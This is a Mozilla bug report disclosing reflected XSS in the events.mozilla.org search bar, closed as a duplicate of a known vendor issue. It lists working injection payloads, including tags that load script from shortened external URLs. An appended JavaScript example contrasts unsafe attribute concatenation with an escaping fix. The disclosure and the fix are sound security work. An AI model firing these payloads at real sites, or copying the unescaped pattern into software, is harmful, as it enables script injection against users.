Closed Bug 1224857 Opened 10 years ago Closed 10 years ago

events.mozilla.org reflected xss

Categories

(mozilla.org :: Security Assurance: Applications, task)

task
Not set
normal

Tracking

(Not tracked)

RESOLVED DUPLICATE of bug 1142658

People

(Reporter: muratyilmazlar1, Unassigned)

Details

Attachments

(1 file)

Attached image xss alert poc
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20151029151421

Steps to reproduce:

Hey, I went to https://events.mozilla.org and I saw the search bar. And I tried some payloads like

</script><script>alert(1)</script>
<input onfocus="prompt(1)">

And I got nothing. But when I tried to bypass it with '"> I was right. I tried a few payloads which begin with '"> and I was successful. Here are some payloads:

<script src=//goo.gl/TJnzmV>
<iframe src=//goo.gl/xWYG4f>
'"><img src=x onerror=alert(document.domain)>
'"><svg/onload=confirm(document.domain)>

These are working fine.

Actual results:

I got an XSS pop-up alert box. And I was successful in finding XSS on the website.

Expected results:

I got an XSS pop-up alert box. And I was successful in finding XSS on the website. I was expected to do it also.
Thank you for reporting this bug, Murat. The issue is already known, but the software is handled by an external vendor and we have to rely on them for updates. Please see the original issue for more.
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Group: mozilla-employee-confidential
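
The behaviour in the report (plain tags ignored, the same tags firing once prefixed with '">) is what reflection into a quoted attribute looks like; the following is an added example, not code from this bug or from the vendor's product, showing that case beside the output encoding that fixes it. It assumes the search term is echoed into a double-quoted value attribute (the page does not show the markup), and renderSearchUnsafe, renderSearchSafe, escapeHtmlAttr and countTags are hypothetical names.

```javascript
// Added example. Assumption: the search term is reflected as
// <input name="q" value="TERM">; the real vendor template is not on the page.

// Unsafe: the term is concatenated into the attribute value unchanged.
function renderSearchUnsafe(term) {
  return '<input type="text" name="q" value="' + term + '">';
}

// Encode every character that can end an attribute value or open a tag.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: same markup, but the term is encoded for the attribute context.
function renderSearchSafe(term) {
  return '<input type="text" name="q" value="' + escapeHtmlAttr(term) + '">';
}

// Simplified, quote-aware scanner (not a full HTML parser): counts how many
// tags the markup opens. More than one means the term escaped the attribute.
function countTags(html) {
  let tags = 0, inTag = false, quote = null;
  for (const ch of html) {
    if (!inTag) {
      if (ch === '<') { inTag = true; tags++; }
    } else if (quote) {
      if (ch === quote) quote = null;        // closing quote of attribute value
    } else if (ch === '"' || ch === "'") {
      quote = ch;                            // opening quote of attribute value
    } else if (ch === '>') {
      inTag = false;                         // end of tag
    }
  }
  return tags;
}

// Search terms quoted from the report above.
const REPORTED_TERMS = [
  '</script><script>alert(1)</script>',            // reported as no effect
  '\'"><img src=x onerror=alert(document.domain)>', // reported as working
  '\'"><svg/onload=confirm(document.domain)>',      // reported as working
];

for (const term of REPORTED_TERMS) {
  console.log(countTags(renderSearchUnsafe(term)), countTags(renderSearchSafe(term)));
}
```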